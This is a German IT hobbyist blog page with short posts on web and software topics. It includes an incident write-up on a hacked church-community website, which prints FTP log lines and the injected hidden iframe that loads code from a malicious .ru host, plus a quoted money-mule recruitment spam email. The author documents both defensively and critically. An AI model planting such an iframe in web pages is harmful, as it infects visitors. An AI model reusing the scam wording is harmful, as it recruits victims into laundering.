Glorf.it

Glorf IT

Bedenkliches aus dem IT-Alltag

10. Februar 2013 um 12:18

Impressum bei Facebook

Nachdem gerichtlich klar gemacht wurde, dass Massenabmahner auch wegen fehlendem Impressum bei Facebook teure Briefe schicken dürfen, sank das Ansehen des Berufsstands bei mir in ungeahnte Tiefen. Details bei Heise-Online.
Jedenfalls hat nun auch die Facebook-Seite der ELIA-Gemeinde dort einen deutlich sichtbaren Link zum Impressum. Die Kirchengemeinde verkauft zwar nichts, aber wer weiß schon, wann die Rechtsauffassung sich wieder ändert…

Nachdem ich nicht wirklich bei Facebook unterwegs bin, musste ich erst mal rumsuchen, welche Möglichkeiten es gibt: Keine schöne und einfache! Am einfachsten ist es einen Link in die Kurzbeschreibung aufzunehmen, aber weil dort keine beschrifteten Links möglich sind, sieht das auch recht hässlich aus.
Schick wäre es als App neben Infos, Fotos, Karte, etc stellen zu können. Dazu muss man aber erst mal eine entsprechende App erstellen und sich zuvor bei Facebook als Entwickler registrieren.

Hier zwei für mich hilfreiche Links:

  • Kurzbeschreibung der verschiedenen Möglichkeiten bei wasistsocialmedia.com
  • Anleitung, wie man eine App erstellt (leicht veraltet) bei itratos.de (PDF). Komischerweise fand ich auf deren Web-Auftritt keine Seite, die auf die Anleitung verlinkte, die mir Google präsentierte. Daher hier nur der Deep-Link…

Hinweise auf einfache und schöne Möglichkeiten sind willkommen… 😉

21. November 2012 um 21:23

Der wiederkehrende Absturz des Thunderbird 17

… trieb mich fast in den Wahnsinn. Jedesmal bei Schreiben einer Mail stürzte Thunderbird nach dem heutigen Update auf Version 17 ab. Erst als ich das Add-In QuickText deaktivierte, hatte ich Ruhe. Eine Internet-Recherche ergab, dass ich da wohl nicht der einzige war…

24. November 2011 um 18:23

Nette 404-Meldungen

Alter, aber guter Link-Tipp: "50 Cool and Creative 404 Error Pages (Part I)"

Bitte beachten: der obige Titel aus dem Jahre 2009 ist nicht ganz korrekt.

  • "Teil I" legt nahe, dass es einen Teil 2 gäbe. Gibt es aber (noch?) nicht.
  • Es sind nur 25 Meldungen beschrieben, der Rest sollte wohl im Teil 2 folgen.

Aber es sind wirklich kreative 404er Meldungen von verschiedenen Webseiten.

22. November 2011 um 23:14

Modernizr

Aus meinem unerschöpflichem Stack an Dingen, die ich mal ausprobieren wollte: Mein Kollege Robert brachte von einem Vortrag aus der Reihe "MSDN on Tour" zum Thema HTML5 diesen LinkTipp mit: Modernizr.

Das ist eine JavaScript-Bibliothek, um schnell und einfach moderne Webseiten zu ermöglichen. Ich werde es wohl nicht mehr schaffen das anzuschauen, aber bevor es veraltet gebe ich den Tipp mal weiter…

19. November 2011 um 16:15

Netter Google Hack

Gebt mal "do a barrel roll" bei Google ein…

25. Mai 2011 um 21:54

Tracking leicht gemacht

In letzter Zeit häufen sich die Webseiten bei denen ich kleine Teile der Webseite nicht richtig sehe: Immer wenn IFrames von fremden Seiten eingebettet werden, z.B. bei Spiegel.de. Meistens handelt es sich dabei um Facebook. Im Bild rechts kann man ganz gut sehen, dass ein IFrame geladen wird mit der Adresse der aktuell besuchten Webseite. Wäre das bei mir nicht blockiert, dann würde dank Cockies durchaus noch mehr passieren. Was dabei genau passiert wird in dem Heise-Artikel "Das Like-Problem – Was Facebooks Gefällt-Mir-Buttons verraten" ganz gut beschrieben. Hier ein Auszug:

Dabei sendet der Browser an Facebook unter anderem als Referer die URL der gerade geöffneten Spiegel-Seite. Außerdem schickt er dem Facebook-Server auch das von ihm bereits früher gesetzte Cookie. Ist der Anwender gerade in einem anderen Fenster bei Facebook angemeldet, enthält das seine Sitzungs-ID. Damit kann Facebook diesen Aufruf der Spiegel-Seite einer konkreten Person zu ordnen.

Konkret kann Facebook also während Sie dort angemeldet sind beobachten, welche Web-Seiten Sie aufrufen, sofern diese einen solchen Like-Button enthalten. Angesichts des Erfolgs des sozialen Netzwerks nimmt deren Zahl ständig zu. Und anders als Statistik-Server wie Google Analytics, die IVW oder auch die Server von Anzeigen-Dienstleistern, die mit anonymisierten Daten oder schlimmstenfalls IP-Adressen arbeiten, kann Facebook diese Daten direkt mit einer realen Person verknüpfen, deren Adresse und Freunde es kennt.[…]

Das mit dem Like-Button war schon eine schlaue Idee von Facebook…

26. April 2011 um 17:45

Fairlangen.org wieder entseucht

In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich darüber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. Über Wege, die mir noch nicht klar sind, hat ein Bösewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem bösartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite "index.php". Einem Menschen wäre sicher sofort aufgefallen, dass die index.htm und index.html nur über einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.

Einen der Log-Einträge habe ich bereits vorher erklärt (ist nur an zwei Stellen anonymisiert):

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (174.37.220.147 sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):

<iframe src="http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==" width="0" height="0" frameborder="0"></iframe>

Aus naheliegenden Gründen habe ich nicht ausprobiert, was dieser fremde Link für Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite würde nämlich sehr schnell von einschlägigen Seiten als bösartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite.

Nach der Änderung aller Passwörter (und dem Eintragen der DB-Passwörter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als wäre die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich sämtliche Software darauf aktualisiert, das war ohnehin fällig.

Aus der Erfahrung meine Tipps in der Situation:

  • cool bleiben und nichts einfach löschen
  • Die Domäne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit älteren Browsern, die nicht warnen, zu schützen.
  • Das FTP-Passwort ändern.
  • Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.
  • Mittels einen DIFF-Tool, wie bspw. BeyondCompare (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln.
  • Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log fündig.
  • Mit der letzten Sicherung zurück setzen.
  • Alle Passwörter ändern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein Bösling könnte sie auch per PHP zippen und dann als Zip runter laden. Ich persönlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.
  • Domäne wieder auf den nun sauberen Stand umleiten und nötigenfalls Updates aller Software einspielen.
  • Google, Firefox, etc davon überzeugen, dass wir wieder zu den Guten gehören.

Das Timing war übrigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, schönes Wetter, …

26. April 2011 um 17:05

FTP-Log-File verstehen

Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein Bösewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: WU-FTPD – Manual: xferlog.5.

Hier ein Beispiel aus dem echten Leben:

Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c

Das bedeutet:

  • Am 19.4.2011 um 14:02 wurde
  • die Datei "index.htm" aus dem Rootverzeichnis (Verzeichnis anonymisiert)
  • mit der Größe 65 Bytes heruntergeladen
  • vom FTP-Benutzer yyyyyyyy von der IP-Adresse 174.37.220.147
  • gelesen ("o" für "output").
  • Und sofort danach mit der Größe 198 Bytes hoch geladen.

Weitere Infos findet man im WU-FTPD – Manual: xferlog.5.

9. Februar 2011 um 18:30

Danke für Ihre Bewerbung

Heute bekam ich eine Antwort auf eine Bewerbung, die ich nicht schrieb:

[…]
Received: from mail1.asiacloudhosting.com (mail2.asiacloudhosting.com [111.90.129.166])
by dd20200.kasserver.com (Postfix) with ESMTP id 09F3F181D9B5A
for ; Wed, 9 Feb 2011 07:10:09 +0100 (CET)
Received: from 84.127.18.120.dyn.user.ono.com (84.127.18.120.dyn.user.ono.com [84.127.18.120]) by mail.asiacloudhosting.com with SMTP;
Wed, 9 Feb 2011 13:54:41 +0800
Subject: Bewerbung als Manager Kassierer
From: sales@ezstamp.com.my
To: webmaster@[…]
Date: Wed, 9 Feb 2011 07:10:09 +0100 (CET)

Guten Tag,

die Geschaftsleitung unserer Firma dankt Ihnen ganz herzlich dafur, dass Sie sich fur unsere Stellenausschreibungen interessiert haben.
Die Gesellschaft KiwiClimate positioniert sich als ein Dealer der gro?ten Hersteller der Klimagerate, wie z.B. SAMSUNG, YORK, LG. Uberdies ist unsere Gesellschaft ein Handelsvertreter von AIRELEC Firmen (diese Firmen produzieren Heizaggregate), von VIESSMANN (das ist eine Firma aus Deutschland, die Dampferzeuger produziert), von Systemair (eine schwedische Firma, die sich mit Beluftungs- und Heizungsanlagenherstellung beschaftigt), von LIEBERT-HIROSS und UNIFLAIR (italienische Unternehmen, die im Bereich der Herstellung von feinen Klimageraten fur Telekommunikationen, Computerzentren und Kommunikationen tatig sind) und von Soler&Palau, (eine spanische Firma, die Beluftungsgerate produziert). KiwiClimate mochte ein ausfuhrliches Leistungsangebot unseren ukrainischen Partnern und Kunden in den anderen Republiken prasentieren. Um es zu schaffen, bemuhen wir uns ein Netz der Dealer in der ganzen Ukraine zu formen. Wir stellen unseren korporativen Partnern und Dealer spezielle An
gebote zur Verfugung. Diese Angebote schlie?en nachfolgende Plus ein: gunstigere Preise, breites Sortiment an Geraten, gute Lieferungs- und Zahlungstermine, verschiedene Moglichkeiten als Unterlieferant sich mit der Lieferung der Gerate und ET, ihrer Montage und Inbetriebnahme zu beschaftigen. Au?erdem kann man als Dealer Servicedienstleistungen erbringen, Schulungen des Personals vor Ort organisieren und Werbungsprogramme unterstutzen.
Da unsere Firma sich stabil entwickelt und erweitert suchen wir jetzt aktive und verantwortungsbewusste Personen, die sich fur einen seriosen Job interessieren und die sich einigen Problemen mit Steuern in unserem Staat gegenuber mit Verstandnis verhalten werden. Zuerst mochten wir gerne die ukrainische Situation bezuglich Wirtschaft darstellen. Dafur stellen wir Ihnen die Angaben einer aufschlussreichen Analyse zur Verfugung. Diese Analyse, die eben PayingTaxes hei?t, wurde zusammen von der Weltbank und von der Wirtschaftsprufungsgesellschaft PriceWaterhouseCoopers durchgefuhrt. Laut dieser Bewertung kann man sagen, dass die Steuerwirtschaft in der Ukraine sich zu lastigsten weltlichen Systemen zahlt. Das kann leicht illustriert werden: 99 verschiedene Arten von Steuern ist die Zahlungspflicht fur die Geschaftsleute in der Ukraine. Zeitaufwand fur alle diesen Zahlungsoperationen betragt etwa 2 Tausend Stunden! Davon ausgehend, bekommt der Staatsschatz ca. 72% des Gewinns d
er Firmen, die legal arbeiten. Die Steuerwirtschaft in der Ukraine kann man als ein sehr kompliziertes System bezeichnen, geschweige denn, dass der Staat selbst die Gesetze immer wieder andert (die Presse gab folgende Angaben als Beispiel: das ukrainische Mehrwertsteuergesetz beinhaltet mehr als 500 Abanderungen, dafur wurden 100 zusatzliche Gesetze erstellt). In der Steuerwirtschaft der Ukraine sollen unbedingt Reformen durchgefuhrt werden, die zur Optimierung des o.g. Systems fuhren sollen. Die Auditoren von PriceWaterhouseCoopers meinen, es sei sehr schwierig sich mit einem rechtlichen Business in der Ukraine zu beschaftigen. Deshalb versuchen die Firmen optimale Steuerbedingungen fur sich auszusuchen. In erster Linie hat das Bedeutung wenn die Firma sich eroffnet, reorganisiert, andert ihre Aktivitaten, sucht neuen Personal usw.
Eine Position, die man als extra verantwortungsvoll bezeichnen kann ist die Stelle eines Manager-Kassierers. Das ist eine Person, die mit regionalen korporativen Geschaftspartnern was zu tun hat. Obwohl, wie gesagt, diese Position viel Verantwortung beinhaltet, verlangt sie keinen gro?en Aufwand. Als unsere Hauptanforderungen konnen wir folgendes nennen: Sie sollten fahig sein Prasentationen durchzufuhren; mit den Leuten positiv zu kommunizieren und damit mit denen gute und stabile Geschaftsbeziehungen zu bilden; Vertrauen der Partner zu gewinnen und aufrechtzuerhalten; die Zahlungen fur die Waren und Leistungen, die jeweils geliefert und erbracht wurden, zu uberwachen; Umsatz im Zahlungsverkehr in der Betriebsbuchhaltung beim Stammhaus durch marktfahige Systeme der Zahlungen zu kontrollieren; mit gutem Erfolg zu verhandeln und dabei ganz ehrlich zu sein.
Falls Sie alles gut verstanden haben und mit uns gerne arbeiten mochten, dann waren wir sehr froh von Ihnen eine Antwort zu bekommen und danach Ihnen weitere Anweisungen zur Verfugung zu stellen. Unsere Geschaftbeziehungen werden vertraglich rechtskraftig beurkundet, weil wir mit Ihnen eine Vereinbarung bezuglich Ihrer Dienstleistungen als unser Agent schlie?en.

Wenn Sie bereit sind anzufangen und fur Sie dabei alles klar ist, dann bitte kontaktieren dir@kiwiclimate.biz Sie uns noch mal fur weitere Anweisungen.

Herzliche Gru?e,

Verstehe ich das richtig, dass hier Leute zum Zweck der Geldwäsche gesucht werden?

Die Domäne kiwiclimate.biz wurde jedenfalls erst vor genau 6 Tagen auf einen Besitzer in Frankreich registriert, unter der angegebenen Mailadresse wurden offenbar schon 588 Domänen reserviert. Eine Webseite www.kiwiclimate.biz gibt es nicht…

12. Dezember 2010 um 22:36

Amazon.de nicht erreichbar [Update]

Seit etwa 30min ist Amazon.de nicht mehr erreichbar. Während man bei Heise.de nachlesen kann, dass Amazon nicht im Fokus steht ("Einfach gesagt: Einen großen Online-Einzelhändler anzugreifen, wenn die Leute Geschenke für ihre Lieben kaufen, wäre geschmacklos."), kocht die Gerüchteküche hoch…
Aber Genaues weiß man nicht. Meine wichtigste Geschenk-Bestellung konnte ich zum Glück noch platzieren.

Update 13.12.2010: Bei Heise.de steht der Grund: ein Hardwareausfall. Wenn die richtige Hardware ausfällt, dann nutzt es rein gar nichts, wenn der Rest redundant ist… 😉

28. Oktober 2010 um 20:17

IE6 und IE7 Detection-Script

Im Artikel "IE6 und IE7 Detection Script zur Einbindung auf der eigenen Webseite" beschreibt Kay Giza wie und unter welchen Bedingungen man das "IE6 und IE7 Detection Script" in die eigene Webseite einbinden kann. Einen kurzen Abriss, was es damit auf sich hat, gab ich im Artikel "Immer noch weg mit dem IE6" wieder: Alte Internet-Explorer-Versionen erkennen und zum Update oder Umstieg bewegen… Erfreulicherweise geht die Initiative von Microsoft aus. 🙂

12. Oktober 2010 um 22:35

Immer noch weg mit dem IE6

Nachdem ich den Artikel "weg mit dem IE6" auf freundliche Bitte von Microsoft entfernte, bin ich Euch noch eine entschärfte Variante schuldig. Microsoft nahm daran Anstoß, dass ich einfach aus der Mail zu der Aktion zitierte. Nun endlich komme ich dazu einen Artikel ganz frei von anstößigen Microsoft-Aussagen zu machen. Hintergrund sind die immer noch recht weit verbreiteten alten Versionen des Internet-Explorers.

Microsoft möchte die "Besitzer" solcher IEs gezielt ansprechen und sie zum Update auf eine aktuelle Version bewegen. Besitzer anderer Browser werden nicht belästigt und merken von der Aktion auch nichts. Dazu muss ich ausnahmsweise ein Java-Script ausführen. Das ist übrigens das einzige Java-Skript hier. Wer also für meine Seite Java-Skript verbietet, der hat keine Nachteile. Und ja, das ist echt eine Microsoft-Aktion. Die tun das.

Wer schon so lange im Internet Webseiten erstellt wie ich, der wird wissen was für ein Krampf es ist IE-konforme Webseiten zu erstellen. Der IE8 ist ja erstmals ein Schritt in die richtige Richtung, der IE9 soll geradezu standard-freundlich werden. Allein wegen der Erfahrung mit den alten Versionen surfe ich persönlich seit Jahren mit Firefox.

Benutzer mit einem Internet Explorer 6 werden alle 6 Stunden zum Upgrade aufgefordert. Die Meldung kann über das "x" weg geklickt oder ignoriert werden:

Benutzer mit Internet Explorer 7 werden ebenfalls alle 6 Stunden zum Upgrade aufgefordert:

Benutzer mit Internet Explorer 8 sehen einmal pro Woche eine Werbung für den IE9-Beta:
Meldung als Info-Bar:

Die Meldungen bei IE6 und 7 finde ich prima, die bei IE8 nicht so richtig, aber die kommt ja nur ab und ab. Diese Belästigung bitte ich zu entschuldigen. Bedenkt: wenn ein paar Leser den IE6 in die Wüste schicken, dann ist doch schon etwas gewonnen. Ob jemand jetzt den Firefox einsetzt oder den neuen IE ist dagegen fast nebensächlich…

Da schon Fragen kamen, wie denn das geht: Ich habe im Body das Java-Script "Internet Explorer Detection" von Microsoft eingebunden. Da man das im Quelltext ohnehin sieht, kann es wohl kaum geheim sein:
<script type="text/javascript" src="http://www.microsoft.com/germany/msdn/components/ie/ieinfobar.js"> </script>

Wer den Inhalt des Java-Skriptes sehen will, dem hilft bspw. "Firebug".

Und bitte denkt daran, dass es keine Frage des Geschmackes oder der Vorliebe ist, ob man mit einem alten Browser surft, sondern eine Frage der Sicherheit.